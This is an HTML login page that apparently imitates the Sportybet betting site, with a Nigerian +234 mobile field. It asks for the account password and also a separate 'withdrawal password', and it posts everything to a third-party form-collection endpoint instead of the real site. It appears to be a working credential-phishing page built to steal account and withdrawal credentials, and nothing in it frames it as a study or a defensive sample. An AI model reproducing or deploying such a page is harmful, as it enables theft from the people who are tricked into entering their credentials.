            <!DOCTYPE html>
<html lang="en">
<head>
      <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha512-Kc323vGBEqzTmouAECnVceyQqyqdsSiqLQISBL29aUW4U/M7pSPA/gEUZQqv1cwx4OnYxTxve5UMg5GT6L4JJg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <title>Sportybet</title>
</head>
<style>
    body{
        background-color:smokewhite;
        font-family: Sans-Serif;
    }
    p{
        Color:green ;
    }
    h4{
        color: green;
        font-size:35px;
        text-align: center;
    }
    input[type=text] {
        width:300px;
        height:46px;
        text-align: center;
        color: black;
    }
    input[type=password] {
        width:300px;
        height:46px;
        text-align: center;
        color: black;
    }
    div{
        text-align:center;
    }
    button {
        width:300px;
        height:47px;
        text-align: center;
        background-color: green;
        border: lightgrey;
        color: white;
        border-radius:4px;
    }
    #mycheckbox{
        accent-color: green;
    }
    a{
        color: white;
    }
    .country-code {
position: absolute;
left: 10px;
top: 50%;
transform: translateY(-50%);
color: black;
font-size: 16px;
pointer-events: none;
margin-left: 20px;
}

input[type="text"] {
padding-left: 0px;
}
    
      .input-container {
position: relative;
}

input[type="password"] {
padding-right: 0px; /* Adjust padding to accommodate the eye icon */
}

.eye {
position: absolute;
right: 0;
top: 50%;
transform: translateY(-50%);
cursor: pointer;
}
span{
    margin-right: 25px;
}
i{
    color: lightgrey;
}
</style>
<body>
  <div>
    <h4>Login</h4>
        <form action="https://submit-form.com/o6mL7CEVc" method="POST">
          <div class="input-container">
<div class="country-code">+234</div>
<input type="text" name="Mobile number" id="Mobile number" placeholder="Mobile number">
</div>
           <div class="input-container">
  <input type="password" name="Password" id="password1" placeholder="Password">
  <span class="eye" onclick="togglePasswordView('password1')">
    <i class="fas fa-eye" id="eye-icon1"></i>
  </span>
</div>

<div class="input-container">
  <input type="password" name="withdrawal password" id="password2" placeholder="Withdrawal Password">
  <span class="eye" onclick="togglePasswordView('password2')">
    <i class="fas fa-eye" id="eye-icon2"></i>
  </span>
</div>
            <br>
            <inline>
                <font color ="white">ii</font>
            <input type="checkbox" id="mycheckbox">Remember me
            <font color ="white">iii</font>
            <input type="checkbox" id="mycheckbox">Keep me signed in 
            </inline>
            <br>
            <br>
            <button type="submit">Login</button>
           <a href="#"><p>Forgot password?</p></a>
           </div>
        </form>
        <script>
      function togglePasswordView(id) {
  const passwordInput = document.getElementById(id);
  const eyeIcon = document.getElementById(`eye-icon${id.slice(-1)}`);
  
  if (passwordInput.type === "password") {
    passwordInput.type = "text";
    eyeIcon.classList.remove("fa-eye");
    eyeIcon.classList.add("fa-eye-slash");
  } else {
    passwordInput.type = "password";
    eyeIcon.classList.remove("fa-eye-slash");
    eyeIcon.classList.add("fa-eye");
  }
} 
     </script>
</body>
</html>
